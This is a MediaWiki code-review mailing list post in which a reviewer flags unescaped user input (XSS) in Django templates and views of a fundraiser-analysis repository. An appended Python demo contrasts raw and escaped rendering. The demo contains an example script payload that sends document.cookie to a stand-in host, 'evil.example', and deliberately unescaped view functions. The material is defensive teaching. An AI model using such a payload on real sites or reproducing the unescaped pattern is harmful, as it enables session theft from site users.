User "Awjrichards" posted a comment on Wikimedia.r205.
Full URL: http://www.mediawiki.org/wiki/Special:Code/Wikimedia/205#c18919

Commit summary:
moving the contents of http://svn.wikimedia.org/viewvc/mediawiki/trunk/fundraiser-statistics/fundraiser-scripts/ for fundraiser analytics and reporting to the wikimedia repository

Comment:
When user input might be displayed back to the user, you should make sure it is escaped to prevent XSS (take a look at the XSS section here: http://www.djangobook.com/en/beta/chapter20/). This is an issue in some of the template files, for instance /trunk/fundraiser-analysis/web_reporting/templates/tests/index.html, and I suspect this is an issue in others as well.

Also, dunno if you're using LML in the django project, but I see unescaped user input in there as well - in /trunk/fundraiser-analysis/web_reporting/LML/views.py

I'll be taking a look at the DataLoader/DataHelper and other classes later.

_______________________________________________
MediaWiki-CodeReview mailing list
[email protected]
https://lists.wikimedia.org/mailman/listinfo/mediawiki-codereview
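Added illustration of the point raised in the comment above (this is example code written for this page, not code from the fundraiser-analysis repository or from Django itself). It uses a tiny stand-in template renderer that mimics Django's autoescape semantics, so that the difference between echoing a request parameter raw (the pattern the reviewer flags in the templates and in LML/views.py) and echoing it escaped can be seen on a constructed payload. The template strings, the `query` parameter name, the payload, and the helper functions are all assumptions made for the demo.

```python
import html
import re

# Minimal Django-style variable syntax: {{ name }} or {{ name|safe }}.
# This is an illustrative reimplementation, NOT Django's template engine.
_VAR = re.compile(r"\{\{\s*(\w+)(?:\|(\w+))?\s*\}\}")


def render(template: str, context: dict, autoescape: bool = True) -> str:
    """Substitute {{ name }} with context[name].

    With autoescape on (Django's default since 1.0), values are HTML-escaped
    unless the template explicitly marks them |safe. With autoescape off, or
    when a value is marked safe, the raw string lands in the page, which is
    exactly the XSS hole the review comment describes.
    """

    def sub(match: re.Match) -> str:
        name, flt = match.group(1), match.group(2)
        value = str(context.get(name, ""))
        if flt == "safe" or not autoescape:
            return value  # trusted-as-is: attacker-controlled markup goes through
        # quote=True also escapes ' and ", so the value is safe inside attributes
        return html.escape(value, quote=True)

    return _VAR.sub(sub, template)


# Constructed attacker input: what a hostile ?query=... parameter might carry.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Hypothetical report page templates. The first reflects the parameter raw.
UNSAFE_TEMPLATE = "<h1>Results for {{ query|safe }}</h1>"
SAFE_TEMPLATE = "<h1>Results for {{ query }}</h1>"


def view_unescaped(query: str) -> str:
    """Hypothetical view that builds HTML by string formatting without escaping
    (the views.py-style problem the reviewer mentions)."""
    return "<p>No data for report '%s'</p>" % query


def view_escaped(query: str) -> str:
    """Same view, escaping the user-controlled value before it enters markup."""
    return "<p>No data for report '%s'</p>" % html.escape(query, quote=True)


def contains_active_script(markup: str) -> bool:
    """Crude check for the demo: does the rendered page still carry a live <script> tag?"""
    return "<script" in markup.lower()


def demo() -> dict:
    """Render both templates and both views against the payload."""
    ctx = {"query": PAYLOAD}
    return {
        "template_unsafe": render(UNSAFE_TEMPLATE, ctx),
        "template_safe": render(SAFE_TEMPLATE, ctx),
        "view_unsafe": view_unescaped(PAYLOAD),
        "view_safe": view_escaped(PAYLOAD),
    }


if __name__ == "__main__":
    for label, page in demo().items():
        flag = "VULNERABLE" if contains_active_script(page) else "ok"
        print(f"{label:16s} {flag:10s} {page}")
```

Running the block shows the `|safe` template and the formatted view both deliver the `<script>` element intact, while the autoescaped template and the `html.escape` view turn `<`, `>`, `"` and `'` into entities so the browser renders the payload as text. In a real Django project the fix is usually to leave autoescaping on and remove stray `|safe` filters or `{% autoescape off %}` blocks, and to use `django.utils.html.escape` (or `format_html`) whenever a view assembles markup by hand.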
